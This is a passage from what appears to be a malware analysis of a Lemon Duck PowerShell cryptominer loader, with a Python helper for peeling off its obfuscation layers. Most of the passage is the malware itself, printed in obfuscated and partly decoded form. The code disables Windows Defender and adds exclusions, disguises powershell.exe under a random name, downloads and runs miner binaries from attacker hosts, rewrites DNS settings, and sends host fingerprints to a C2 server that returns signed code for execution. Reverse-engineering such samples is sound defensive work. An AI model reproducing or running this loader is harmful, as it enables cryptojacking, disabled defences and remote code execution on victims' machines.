F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xwZmI+ZmI-objd0xect net.webcd0xlient).JGAdownl'+'oadstringZmI+ZmIJGA(E2Dh'+'ttp://127.0.0.1:43669/1/summaryE'+'2D))
F2Emv=F2Eobj.versi'+'on
F2Emip=F2Eobj.connect'+'io'+'n.ip
ZmI+ZmI
Z'+'mI+Z'+'mIF2Emhr=F2Eobj.hashrate.tZmI+ZmIotal-join(E2D,E2D'+')}catch{}
try{
Set-MpPrefeZmI+ZmIrence -DisableRZmI+ZmIealtimeMonitoring 1
Add-MpPre'+'ference -ExclusionPath c:q5E
Add-MpPreference -ExclusiZmI+ZmIonProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShellZmI+ZmIq5Ev1.0q5EpZmI+ZmIowershell.exeZmI+ZmI
Add-MZmI+ZmIpPreference -ExclusionProcess c:q5Ew'+'indowsq5Esystem32q5ZmI+ZmIEWindowsPoweZmI+ZmIrShellq5Ev1.0q5EF2EreZmI+ZmIname
ZmI+ZmI}'+'catch{}
ZmI+ZmI
i'+'f((F2Ecar'+'d'+' -match ZmI+ZmIJGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}
if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}
F2Ev=F2Eurl.split(JGA?JGA)[1]
F2Eparams'+'=@(F2Ev,F2Ecomp_name,F2EguiZmI'+'+ZmId,F2Emac)-joinJGA&JGA
set-locaZmI+'+'ZmItion F2Eenv:tmp
functZmI+ZmIion sZmI+ZmItp(F2E'+'gra){
write-host '+'FZmI+ZmI2Egra
Start-Process -File'+'Path cmd.exe -ArgumentLi'+'st JGA/c F2EgraJGA
}
function gcf(F2ZmI+Zm'+'IEcode,F2Emd,F2Efn){
('+'E'+'2Decho E2D+F2Ecode+E2'+'D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2'+'Eenv:tmp+EZmI+ZmI2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url=ZmI+ZmIE2DE2DEZmI+ZmI2D+F2EdowZmI+'+'ZmIn_url+E2DE2'+'DE2DZmI+ZmI;function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(F2EZmI+ZmIcon)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};r'+'eturn F2ZmI+ZmIEs}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp)'+';F2Emd'+'5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup'+'=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect NetZm'+'I+ZmI.WebCd0xlient).downloaddata(ZmI+ZmIF2Edown_u'+'rl+E2DZ'+'mI+ZmIE2D/E2D+F2Efn+E2D?E2D+F2Epara'+'ms'+'+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et'+'-eqF2Eifmd5){[System'+'.IO.Fil'+'e]::WriteAZmI+ZmIllBytes(F2Eifp,F2Econ)}elZmI'+'+ZmIse{F2Enoup=1}ZmI+ZmI}if(ZmI'+'+Z'+'mIF2Enoup){F2Econ=F2Eco'+'n_;F2Eifmd5=F2Emd5_}E2D).replace(E2DW'+'dnE2D,E2D^^^WdnE2D).replac'+'e(E2D&E2D,E2D^^^&E2DZmI+ZmI'+')
}
function gpa(F2Efnam,F'+'2Ename){
(E2Dfor(F2EiZmI+'+'ZmI=0;F2Ei -lt F2Econ.co'+'untZmI+Zm'+'I-1;F2Ei+=1){if(F2E'+'con[F2Ei] -eq '+'0x0'+'a){breaZmI+ZmIk}};id0xex(-join[char[]]'+'F2Ec'+'on[0..F2Ei]);F2Ebin=(NewZmI+ZmI-Object IO.B'+'inaryReader(New-Object System.IO.CoZmI+ZmImpression'+'.GzipStream (New-ObZmI+ZmIje'+'ct System.IO.MemoryS'+'tream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), Zm'+'I+ZmI([IO.Compr'+'ession.CompressionMode]::Decompress))).ReadBytes(10000000)ZmI+ZmI;F2Ebin_=F2Ebin.Clone();F2Emep=F2Een'+'v:tmp+ZmI+ZmIE2DE2DE2D+JGAZmI+ZmIq5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::Wr'+'iteAllByt'+'es(F2Emep,F2Ebin_+(('+'1..127)WdnGet-Random -Count 100));test1'+' -PEBytes F2EbinE2D'+').replace(E2DWdnE2D,E2D^^^WdnE2D'+')'+'.re'+'place(E2D&ZmI+ZmIE2D'+',E2D^^^&E2D)+JGAWdnFZmI+ZmI2Ename - &cmd /c copy /y %tmpZmI+ZmI%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA
}
'+'funcZmI+ZmItion gpb(F2EnameZ'+'mI+ZmI){
'+' E2DId0'+'xEX(-join[char[]]F2Econ)W'+'dnE2D+F2Ename'+'+E2D -E2D
}
function gcode(F2Efl) '+'{
E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Efl'+'ase;N'+'ew-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocal'+'E2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+'+'E2D)}catch{}E2D
}
F2E'+'ZmI+ZmIcode1'+'=gcode JGAIfJGA
Id0xEx F2Ecode1
if(F2ElocalIf){
stZmI+ZmIp ((gcf F2Ecode1 F2EifmdZmI+ZmI5 F2Eifbin)+(gpb F2Erename))
}
i'+'f(F2Eis64){
F2EZmI+ZmIc'+'ZmI+ZmIode2=gcode JGATMnJGA
Id0xEx F2Ecode2
ifZm'+'I+ZmI(F2'+'ElocalTMn){
stp ((gcf F2Ecode2 F2Em'+'mZmI+ZmId5 F2Embin)+(g'+'p'+'a F2Embin'+' F2E'+'rename))
'+'}
}
'+'if((F2Eisn -or F2Eisa) -and F2Eis64){
'+'
F2Ecode3=gcode JGATMngJGZmI+ZmIA
Id0xEx F'+'2Ecode3
if(F2ElocalTMng){
stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emg'+'binZmI+ZmI F2Ere'+'name))
}
}
F2Ecode4=gcod'+'ZmI+ZmIe JGAKrJGA
Id0xE'+'x F2Ecode4
if'+'(F2El'+'ocalK'+'r){
stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb ZmI+ZmIF2Erename))
}
stp (ZmI+ZmIE2Decho try{F2E'+'s=[System.NeZ'+'mI+ZmIt'+'.Sockets'+'.TcpListener]65529;'+'F2Es.start();while(1){}}catch{}Wd'+'nE2D+F2ErenZmI+ZmIame+E2D -E2D)
F2E'+'conf_f=test-pa'+'th c:q5Ewindowsq5Esystem32q5EWindowsPowerShZmI+ZmIellq5Ev1.0q5EconfiZmI+ZmIgXXX1'+'.'+'json
F2'+'Elmip=[System'+'.Net.Dns]::GetHo'+'stAddresses(JGAp.b69'+'kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }
F2Etpid,F2Etpna'+'me=(ge'+'ZmI+Z'+'mIt-ZmI+ZmIprocessWdnsort cpu -Des'+'cendinZmI+ZmI'+'gWdnselect-objectZmI+ZmI -first'+' 1WdnforeZmI+ZmIach{F2E_.id,FZmI+ZmI2E_.processnam'+'e})
F2Etcpconn = NetStat -anop'+' TCP
F2Eipport=JGAJGA
foreach(F2Et in F2Etcpconn){
F2Elin'+'e = F2Et.'+'sZmI+ZmIplit(E2D E2D)Wdn ? {F2E'+'_}
if'+' (F2ElineZ'+'mI+ZmI -eq FZmI+ZmI2Enull) '+'{ continue }
'+' if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2'+'Etpid)){
F2Eipport = F2Eline[2]
break'+'
}
}
try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder'+'(@(E2DZmI+ZmI8.8.8.8E2D,ZmI+ZmIE2'+'D'+'9.9'+'.9.9'+'E2D))}catch{}
F2EparZmI+ZmIams+=J'+'GA'+'&JGA+(@(FZmI+ZmI2Eos,[Int]F2Eis64,F2EZmI+ZmIuser,F2Edomain,F2EZmI+ZmIdrive,F2Ecpuname,F2Ec'+'ardZmI'+'+ZmI,F2Emem,F2Ecpu'+'_per,[InZmI+ZmItZmI+ZmI]F2Epermi'+'t,(ZmI+ZmIF2Elifmd5ZmI+ZmI[0..5]'+'-joZmI+ZmIinJGAJGA),(F2Elmmd5[ZmI+ZmI0..5]-joinJGAJGA),(F2Elk'+'rmdZmI+ZmI5[0..ZmI+ZmI5]-joinJGAJGA),F2ZmI+ZmIEmv,F2Emip,F2EmhrZmI+ZmI,F2EuptimZmI+Z'+'mIe,[Int]F2'+'Ec'+'onf_f,F2Elmip,F2EtpnaZmI+ZmIme,F2Eip'+'port,JGA0.9JGA)-joinJGA&JGA)
function SIEX {
Param(
[string]F2Eurl
)
try{
F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient
F2Efinalurl ='+' JGAF2EurlJGA+JGA?JGA+JGAF2Eparam'+'sJGA
ZmI+ZmItry{
F2EwebclientZmI+ZmI.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.reZmI+ZmIplace(E2DZmI+ZmIq5EE2D,E2D-E2'+'D))
} catch{}
F2Eres_bytes = F2Ewebclient.DownloadData(ZmI+ZmIF2Efinalurl)
if(F2Eres_bytes.count -gt 173){
F2Esign_bytes = F2EresZmI+ZmI_bytes[0..171];
ZmI+Zm'+'IF2Eraw_byteZmI+ZmIs = F2Eres_bytes'+'[173..F2Eres_bytes.count];
'+'F2ZmI'+'+ZmIErsaParams'+' ='+' New-Object System.Security.C'+'rypt'+'ographZm'+'I+ZmIy.RSAParameters
F2Er'+'sa'+'Params.Modulus = '+'0xda,0x65,0xa8,0xdZmI+ZmI7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,Z'+'mI+ZmI0'+'xff,0x'+'2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,'+'0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,'+'0xcd,'+'0x37,0x6b,0xf3,0'+'x4f,0x3b,0x62,0x70,0x86,0x07'+',0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xd'+'c,0x88,0xbf,0x35,0xf2,0x92,0xee'+',0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xZmI+ZmId1,0x'+'19,0x'+'30,0x73,0xc6,0x52,0x01,0xcd,0'+'xe7,0xc7,0xZmI+ZmI34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0'+'xcd,0x79,0x40,0xa7,0x91,0x6a,0x'+'ae,0x95,0'+'x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a'+',0x98,0xdb,0x97,0x3f,0xf6ZmI+ZmI,0x2e,0x95,0x10,0x'+'72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xZmI+ZmIea,0x38,0xb7,0x47,0x6b,0x5d
F2ErZmI+ZmIsaParams'+'.ExponZmI+ZmIent = 0x01,0x00,0x01
F2ErsZmI+ZmIa = New-Object -TyZmI+ZmIpeName System.Security.Cryptography.RSACryptoS'+'erviceProvider;
F2Ersa.ImportPZmI+ZmIarameters(F2'+'ErsaParams)
'+'
FZm'+'I+ZmI2EbasZmI+ZmIe64 = -join([cha'+'r[]]F2EZmI+ZmIsign_bytes)
F2EbyteArray = [convert]::FromBase64Stri'+'ng(F'+'2Ebase64)
F2Esha1 = New-Object Sys'+'t'+'ZmI+ZmIem.SecuZmI+ZmIrity.Cryptography.SH'+'A1CryptoServi'+'ceProvider
if(F2Ersa.verifyData(F'+'2'+'Eraw_bytes,F2Esha1,F2EbyteArray)) {
IZmI'+'+ZmIEX (-jo'+'in[char[]]F2Eraw_bytes)
}
}
} c'+'atch{}
}
StartZmI+ZmI-Sleep -Seconds 3
SIEX JGAF2Ecore_url/report.jspJGA
Zm'+'I)-rEplAcE ([cHaR]87+[cHaR]100+'+'[cHaR]110),[cHaR]124 -rEplAcEZmIE2DZmI,[cHaR]39 -r'+'EplAcE ([cHaR]70+[cHaR]50+'+'[cHaR]69),[cHaR]36-c'+'rEPLAcE([cHaR]100+[cHaR]4'+'8+[cHaR'+']12'+'0),[cHaR]96-crEPLAcEZmIJGAZmI,'+'[cHaR]34 -rEplAcE ([cHa'+'R]113+[cHaR]'+'53+[cHaR]69),[cHaR]92) )
') -CRePlACE 'ZmI',[chaR]39 -repLACE 'EwT',[chaR]36))
We got some familiar-looking code, but it is still obfuscated: the string literals are glued together with '+', and the real characters are hidden behind placeholder tokens that the trailing -replace chain swaps back in (ZmI and EwT in the outer layer; Wdn, E2D, F2E, d0x, JGA and q5E in the inner one). So let’s deobfuscate the code again.
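Both the Stage 1 reversal and the Stage 2 substitution layers can be undone statically. The following Python is an added example, not code from the original article: it reverses the character array, then repeatedly locates the ((' ... ') -replace ...) wrapper, glues the '+' pieces the way PowerShell’s parser would, parses the -replace/-creplace chain (quoted operands and [char]N sums) and applies it, until no wrapper is left. The sample it runs on is a constructed benign script wrapped in the same two-layer scheme, not the a.jsp text; the function and variable names are mine. To run it on the real sample, pass it the contents of the $K8n3d array (just the quoted text).

```python
import re

# One layer looks like:  ( (('<pieces>') -replace A,B -creplace C,D ... ))
# <pieces> is a run of single-quoted fragments joined with '+'; the operands are
# either 'literal' strings or sums of [char]N values.
LAYER_RE = re.compile(r"\(\s*\(\s*\('(?P<lit>.*)'\)\s*(?P<tail>-c?replace.*)", re.S | re.I)
_OP = r"(?:'([^']*)'|\(?((?:\[char\]\d+\+?)+)\)?)"
PAIR_RE = re.compile(r"-(c?)replace\s*" + _OP + r"\s*,\s*" + _OP, re.I)


def _operand(literal, char_sum):
    """Decode one -replace operand: a quoted string or a sum of [char]N values."""
    if literal is not None:
        return literal
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", char_sum, re.I))


def parse_replace_chain(tail):
    """Return [(pattern, replacement, case_sensitive), ...] in evaluation order."""
    chain = []
    for m in PAIR_RE.finditer(tail):
        cs, lit1, chr1, lit2, chr2 = m.groups()
        chain.append((_operand(lit1, chr1), _operand(lit2, chr2), bool(cs)))
    return chain


def peel_layer(script):
    """Strip one ((' ... ') -replace ...) wrapper and return the script it yields."""
    m = LAYER_RE.search(script)
    if not m:
        raise ValueError("no ((' ... ') -replace ...) layer found")
    # PowerShell parses 'a'+'b' into the single value ab before -replace ever
    # runs, so the seams go first and the substitutions are applied afterwards.
    text = m.group("lit").replace("'+'", "")
    for pattern, repl, case_sensitive in parse_replace_chain(m.group("tail")):
        # -replace is regex based and case-insensitive, -creplace is case-sensitive.
        # A callable replacement keeps '\' and '$' from being read as templates.
        flags = 0 if case_sensitive else re.I
        text = re.sub(re.escape(pattern), lambda _m, r=repl: r, text, flags=flags)
    return text


def deobfuscate(stage1_array, max_layers=8):
    """Undo [Array]::Reverse, then peel substitution layers until none remain."""
    script = stage1_array[::-1]
    for _ in range(max_layers):
        try:
            script = peel_layer(script)
        except ValueError:
            break
    return script


# --- constructed sample: benign body, same two-layer scheme as a.jsp ---
FINAL_SCRIPT = '$p=Get-Process|sort cpu -Descending|select -first 1;"top=$($p.Name)"'
# Inner layer: tokens stand in for $ | " and the '+' seams are spelled ZmI+ZmI,
# because they only become quotes after the outer layer runs.
_INNER = ("F2Ep=Get-ProcZmI+ZmIessWdnsort cpu -Desc'+'endingWdnselect -first 1;"
          "JGAtop=F2E(F2Ep.NaZmI+ZmIme)JGA")
_OUTER = (
    ".( ([string]EwTVerbosePreference)[1,3]+ZmIxZmI-joinZmIZmI) ( ((ZmI" + _INNER + "ZmI)"
    " -replace ZmIWd'+'nZmI,[char]124 -replace ZmIE2DZmI,[char]39"
    " -replace ([char]70+[char]50+[char]69),[char]36 -creplace ZmId0xZmI,[char]96"
    " -creplace ZmIJGAZmI,[char]34 -replace ZmIq5EZmI,[char]92)"
)
# $shellid[1]+$shellid[13]+'x' spells iex; the string below, read forwards, is
# what the sample's reversed [char[]] holds.
STAGE1_SAMPLE = (
    "&( $sHElLid[1]+$ShELLID[13]+'x') ( ((' " + _OUTER
    + "') -creplace 'ZmI',[char]39 -replace 'EwT',[char]36))"
)[::-1]

if __name__ == "__main__":
    print(deobfuscate(STAGE1_SAMPLE))
```

The order matters: stripping '+' after the substitutions would turn the freshly inserted quotes from E2D into seams and eat real characters, which is why each layer is handled as parse-then-replace, exactly as the interpreter does it.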
Stage 3
After undoing the outer layer (ZmI → ' and EwT → $), the code we have is ⬇️ this; the inner tokens and the '+' seams are still in place:
( (('F2Eis64=[int]([IntPtr]:'+':Size -eq 8)
F2Eifbin=JGAif.binJGA
F2Eifmd5=JGA04f9fd'+'d312702343f0'+'74e5dd9a1ffe6fJGA
F2Ekrbin=JGAkr.binJGA
F2Ekrmd5=JGAb7a1cfd74661361f71856388dac5aaa6JGA
if(F2Ei'+'s64){
F2Embin=JGAm6.binJGA
F2Emmd5=JGA32390a001e1207eafdd66e35c5'+'5aa9d3JGA
F2Emgbin=JGAm6g.binJGA
F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA
}
function gmd5(F2Ed){
[Security.Cryptography'+'.MD5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}
'+'return F2El
}
function getrname(){
F2Erpath=JGAC:q5EWindowsq5ES'+'ystem32q5EWindowspowershellq5EV1.0JGA
F2Eenames = gci JGAF2Erpathq5E*JGA -Include *.exe -Exclude powershell.exeWdnforeach{F2E_.name}
F2Etmd'+'5 = gmd5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5Epowershell.exeJGA))
'+' foreach(F2Eename in F2Eenames){
'+' F2Emd5_=gm'+'d5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5EF2EenameJGA))
if(F2Etmd5 -eq F2Emd5_){
'+' return F2E'+'ename'+'
}
}
F2Eename=-join([char[]](48..57+65..90+97..12'+'2)WdnGet'+'-Random -Count (6+(Get-Random)%6)) + JGA.exeJGA
copy-item JGAF2E'+'rpathq5Epowershe'+'ll.exeJGA JGAF2Erpathq5EF2EenameJGAWdnout-null
if(!(test-path '+'JGAF2Erpathq5EF2EenameJGA)){F2Eename=JG'+'Apo'+'wershell.exeJGA}
return'+' F2Eename
}
F2Erename=getrname
F2Elifmd5,F2Elmmd5,F2'+'Elkrmd5=JGAJGA,JGAJGA,JGAJGA
try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}
try{F'+'2Elmmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EmbinJGA))}catch{}
try{F2Elkrmd5=gmd5'+' ([IO.File]::ReadAl'+'lByt'+'es(JGAF2Ee'+'n'+'v:t'+'mpq5EF2EkrbinJGA))}catch{}
F2Edown_url = JGAhttp://d.u78wjd'+'u.'+'comJGA
if(!F2Eurl){F2Eurl=JGAhttp://t.bb3u9.comJGA}
F2Ecore_url = F2Eurl.split(JGA/JGA)[0..2]-joinJGA/JGA
F2Epermit = ([Security.Principal.WindowsPrincipal][Security.P'+'rincipal.WindowsIdentity]::GetCur'+'rent()).IsInRole([Security.Principal.W'+'indowsBuiltInRole'+'] JGAAdministratorJGA)
F2Ecomp_name = F2Eenv:COMPUTERNAME
F2Eguid = (get-wmiobject Win32_ComputerSyste'+'mProduct).UUID
F2Emac = (Get-WmiObject Win32_NetworkAdapterConfigur'+'ati'+'on Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firs'+'t 1
F'+'2Eosb = (Get-Wm'+'iObject -class Win32_OperatingSystem)
F2Eos = F2Eosb.Caption.replace(J'+'GAMicrosoft Windows JGA,JGAJ'+'GA)+JGA_JGA+F2Eosb.Version
F2Euser = F2Eenv:USERNAME
'+'F2Edomain = (Get-WmiObjec'+'t win32_comput'+'ersyst'+'em).Domain
F2Euptime = [timespan]::FromMilliseconds([environment]::TickCount)Wdnforeach{F2E_.totalseconds}
F2Ecpuname = (get-wmiobject '+'win32_processor).name
F2Ecard = (Get-WmiObject Win32_VideoController).name
F2Ecpu_per = JGAF2E((Get-WmiObject'+' -'+'Class Win32_Pr'+'ocessor).LoadPercentage)JGA
gwmi Win32_Physical'+'Memory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2Em'+'sum/1Gb
try{
F2Edrive = ([system.IO.DriveInfo]::GetDrives('+') '+'Wdn where {F2E_.IsReady -and (F2E_.AvailableFreeSpace -gt 1024) -and ((F2E_.DriveType -'+'eq JGARemovableJGA) -or (F2E_.DriveType -eq JGANetworkJGA)) -and ((F2E_.DriveFormat -eq JGANTFSJGA) -or (F2E_.DriveFormat -eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+'+'(F2E_.Dr'+'iveType.tostring())[0]})-joinJGAWdnJGA}catch{}
try{
[Reflection.Assembly]::LoadWithPar'+'tialName(JGASystem.Web.Extension'+'sJGA)
F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xw'+'-objd0xect net.webcd0xlient).JGAdownloadstring'+'JGA(E2Dhttp://127.0.0.1:43669/1/summaryE2D))
F2Emv=F2Eobj.version
F2Emip=F2Eobj.connection.ip
'+'
'+'F2Emhr=F2Eobj.hashrate.t'+'otal-join(E2D,E2D)}catch{}
try{
Set-MpPrefe'+'rence -DisableR'+'ealtimeMonitoring 1
Add-MpPreference -ExclusionPath c:q5E
Add-MpPreference -Exclusi'+'onProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShell'+'q5Ev1.0q5Ep'+'owershell.exe'+'
Add-M'+'pPreference -ExclusionProcess c:q5Ewindowsq5Esystem32q5'+'EWindowsPowe'+'rShellq5Ev1.0q5EF2Ere'+'name
'+'}catch{}
'+'
if((F2Ecard -match '+'JGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}
if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}
F2Ev=F2Eurl.split(JGA?JGA)[1]
F2Eparams=@(F2Ev,F2Ecomp_name,F2Egui'+'d,F2Emac)-joinJGA&JGA
set-loca'+'tion F2Eenv:tmp
funct'+'ion s'+'tp(F2Egra){
write-host F'+'2Egra
Start-Process -FilePath cmd.exe -ArgumentList JGA/c F2EgraJGA
}
function gcf(F2'+'Ecode,F2Emd,F2Efn){
(E2Decho E2D+F2Ecode+E2D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2Eenv:tmp+E'+'2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url='+'E2DE2DE'+'2D+F2Edow'+'n_url+E2DE2DE2D'+';function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().ComputeHash(F2E'+'con)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};return F2'+'Es}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp);F2Emd5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect Net'+'.WebCd0xlient).downloaddata('+'F2Edown_url+E2D'+'E2D/E2D+F2Efn+E2D?E2D+F2Eparams+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et-eqF2Eifmd5){[System.IO.File]::WriteA'+'llBytes(F2Eifp,F2Econ)}el'+'se{F2Enoup=1}'+'}if('+'F2Enoup){F2Econ=F2Econ_;F2Eifmd5=F2Emd5_}E2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&E2D,E2D^^^&E2D'+')
}
function gpa(F2Efnam,F2Ename){
(E2Dfor(F2Ei'+'=0;F2Ei -lt F2Econ.count'+'-1;F2Ei+=1){if(F2Econ[F2Ei] -eq 0x0a){brea'+'k}};id0xex(-join[char[]]F2Econ[0..F2Ei]);F2Ebin=(New'+'-Object IO.BinaryReader(New-Object System.IO.Co'+'mpression.GzipStream (New-Ob'+'ject System.IO.MemoryStream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), '+'([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000)'+';F2Ebin_=F2Ebin.Clone();F2Emep=F2Eenv:tmp+'+'E2DE2DE2D+JGA'+'q5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::WriteAllBytes(F2Emep,F2Ebin_+((1..127)WdnGet-Random -Count 100));test1 -PEBytes F2EbinE2D).replace(E2DWdnE2D,E2D^^^WdnE2D).replace(E2D&'+'E2D,E2D^^^&E2D)+JGAWdnF'+'2Ename - &cmd /c copy /y %tmp'+'%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA
}
func'+'tion gpb(F2Ename'+'){
E2DId0xEX(-join[char[]]F2Econ)WdnE2D+F2Ename+E2D -E2D
}
function gcode(F2Efl) {
E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Eflase;New-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocalE2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+E2D)}catch{}E2D
}
F2E'+'code1=gcode JGAIfJGA
Id0xEx F2Ecode1
if(F2ElocalIf){
st'+'p ((gcf F2Ecode1 F2Eifmd'+'5 F2Eifbin)+(gpb F2Erename))
}
if(F2Eis64){
F2E'+'c'+'ode2=gcode JGATMnJGA
Id0xEx F2Ecode2
if'+'(F2ElocalTMn){
stp ((gcf F2Ecode2 F2Emm'+'d5 F2Embin)+(gpa F2Embin F2Erename))
}
}
if((F2Eisn -or F2Eisa) -and F2Eis64){
F2Ecode3=gcode JGATMngJG'+'A
Id0xEx F2Ecode3
if(F2ElocalTMng){
stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emgbin'+' F2Erename))
}
}
F2Ecode4=gcod'+'e JGAKrJGA
Id0xEx F2Ecode4
if(F2ElocalKr){
stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb '+'F2Erename))
}
stp ('+'E2Decho try{F2Es=[System.Ne'+'t.Sockets.TcpListener]65529;F2Es.start();while(1){}}catch{}WdnE2D+F2Eren'+'ame+E2D -E2D)
F2Econf_f=test-path c:q5Ewindowsq5Esystem32q5EWindowsPowerSh'+'ellq5Ev1.0q5Econfi'+'gXXX1.json
F2Elmip=[System.Net.Dns]::GetHostAddresses(JGAp.b69kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }
F2Etpid,F2Etpname=(ge'+'t-'+'processWdnsort cpu -Descendin'+'gWdnselect-object'+' -first 1Wdnfore'+'ach{F2E_.id,F'+'2E_.processname})
F2Etcpconn = NetStat -anop TCP
F2Eipport=JGAJGA
foreach(F2Et in F2Etcpconn){
F2Eline = F2Et.s'+'plit(E2D E2D)Wdn ? {F2E_}
if (F2Eline'+' -eq F'+'2Enull) { continue }
if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2Etpid)){
F2Eipport = F2Eline[2]
break
}
}
try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder(@(E2D'+'8.8.8.8E2D,'+'E2D9.9.9.9E2D))}catch{}
F2Epar'+'ams+=JGA&JGA+(@(F'+'2Eos,[Int]F2Eis64,F2E'+'user,F2Edomain,F2E'+'drive,F2Ecpuname,F2Ecard'+',F2Emem,F2Ecpu_per,[In'+'t'+']F2Epermit,('+'F2Elifmd5'+'[0..5]-jo'+'inJGAJGA),(F2Elmmd5['+'0..5]-joinJGAJGA),(F2Elkrmd'+'5[0..'+'5]-joinJGAJGA),F2'+'Emv,F2Emip,F2Emhr'+',F2Euptim'+'e,[Int]F2Econf_f,F2Elmip,F2Etpna'+'me,F2Eipport,JGA0.9JGA)-joinJGA&JGA)
function SIEX {
Param(
[string]F2Eurl
)
try{
F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient
F2Efinalurl = JGAF2EurlJGA+JGA?JGA+JGAF2EparamsJGA
'+'try{
F2Ewebclient'+'.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.re'+'place(E2D'+'q5EE2D,E2D-E2D))
} catch{}
F2Eres_bytes = F2Ewebclient.DownloadData('+'F2Efinalurl)
if(F2Eres_bytes.count -gt 173){
F2Esign_bytes = F2Eres'+'_bytes[0..171];
'+'F2Eraw_byte'+'s = F2Eres_bytes[173..F2Eres_bytes.count];
F2'+'ErsaParams = New-Object System.Security.Cryptograph'+'y.RSAParameters
